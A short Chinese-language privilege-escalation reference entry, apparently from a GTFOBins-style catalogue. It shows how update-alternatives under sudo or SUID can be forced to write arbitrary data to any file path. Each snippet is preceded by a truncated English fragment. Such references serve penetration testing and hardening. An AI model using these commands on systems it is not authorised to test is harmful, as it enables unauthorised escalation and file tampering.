如果二进制文件被 sudo 允许以超级用户身份运行,可能被用于访问文件系统、提升或维持特权访问。
$LFILE a symlink to $TF. LFILE=/path/to/要写入的文件
TF=$(mktemp)
echo DATA >$TF
sudo update-alternatives --force --install "$LFILE" x "$TF" 0
suid是一种授予文件的权限类型,它允许用户使用者以文件所有者的权限来执行文件。
$LFILE a symlink to $TF. LFILE=/path/to/要写入的文件
TF=$(mktemp)
echo DATA >$TF
./update-alternatives --force --install "$LFILE" x "$TF" 0